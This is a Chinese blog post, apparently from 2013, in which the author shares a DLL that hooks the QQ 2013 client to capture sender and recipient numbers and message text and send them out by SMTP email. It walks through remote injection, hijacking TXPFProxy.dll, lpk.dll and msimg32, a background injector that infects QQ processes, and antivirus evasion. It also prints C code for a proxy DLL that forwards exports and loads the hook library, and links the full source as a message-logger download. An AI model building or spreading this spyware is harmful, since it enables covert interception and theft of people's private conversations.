写一个简单DLL 获取QQ消息的DLL,貌似网上有卖这个,但貌似对于QQ2013是不行的,因为他用动态劫持,貌似最新版用QQ劫持都有点不行。我测试用远程注入,你可以自己写代码实现远程注入软件也可以网上下载远程注入软件,我为了方便大家把自己写非常远程软件上传到这里,方便你测试。我先截一下效果图 这个我只是简单获取 发送方QQ 号 和目标的QQ号 和 文本内容,你如果有其他需求,自己可以添加对应的HOOK的QQ API获取对应信息,也可以上网百度或者google一下。记住发送邮件要用线程不然会阻塞QQ。代码你可以任意修改,任意发布
我这里只是写了简单的DLL,你可以一个exe 主程序,这个主程序可以后台运行,当发现有QQ进程 ,并且没有注入你的DLL,你就可以注入DLL,这是一个比较可行的办法。如果杀毒软件拦截,你直接添加信任,下次就不会出现提示框了,QQ对于远程注入会认为合法。但对于DLL劫持加载DLL 会阻止。我劫持lpk.dll 和 msimg32 都会拦截,而且金山杀毒只要你复制 这样名字的dll 都会报毒,但你扫描他又认为没有毒,可见杀毒这样的DLL原理还是比较简单,我估计金山是对shell 进行挂钩 。 但貌似如果我用写编译器可以生成这样的文件,杀毒软件是不会报毒,我设想我就用c 语言 fopen fwrite fread 写一个 exe 应该杀毒软件就不会报毒了,或许这是金山的BUG。(我没有测试我的想法,你感兴趣可以试试)。我的DLL构成:MAIL: ZBase64.h ZBase64.cpp CMail.cpp CMail.h 处理发送简单SMTP邮件HOOK:ULHook.cpp ULHook.h 处理HOOKMAIN: main.cpp 业务层吧。我发送邮件时用多线程,当你输入字数超过10个我就开始发送了(这里只是为了测试用的),你可以定义100或者更长看你的需求。 我测试一下劫持 TXPFProxy.dll(进入安全模式把源码TXPFProxy.dll 改为TXPFProxy1.dll ,因为QQ 用驱动保护这个文件不能够被修改删除)
但貌似QQ会崩溃后面就不加载这个dll. 不知道是不是的假冒的dll 有问题还是怎么了。
我觉得这样写应该没有问题。。。
1 #include <Windows.h>
2 #include <process.h>
3
4 #pragma comment(linker,"/EXPORT:DllCanUnloadNow=TXPFProxy1.DllCanUnloadNow")
5 #pragma comment(linker,"/EXPORT:DllGetClassObject=TXPFProxy1.DllGetClassObject")
6 #pragma comment(linker,"/EXPORT:DllRegisterServer=TXPFProxy1.DllRegisterServer")
7 #pragma comment(linker,"/EXPORT:DllUnregisterServer=TXPFProxy1.DllUnregisterServer")
8 #pragma comment(linker,"/EXPORT:GetProxyDllInfo=TXPFProxy1.GetProxyDllInfo")
9
10 void Init(void*)
11 {
12 Sleep(10000);
13 LoadLibraryA("CULHook.dll");
14 }
15
16 int __stdcall DllMain(_In_ HANDLE _HDllHandle, _In_ DWORD _Reason, _In_opt_ LPVOID _Reserved)
17 {
18 if(_Reason == DLL_PROCESS_ATTACH)
19 {
20 _beginthread(Init,0,NULL);
21 }
22
23 }
现在对QQ的DLL劫持 不是那么好做了啊,算了,反正我对这个不感兴趣,只是好玩,基本已经达到我的要求,我又不要卖这个软件。
附件代码:
/Files/xvsdf100/QQ消息记录器.zip
posted on 2013-05-10 13:12
小鱼儿 阅读(4629)
评论(1) 编辑 收藏 引用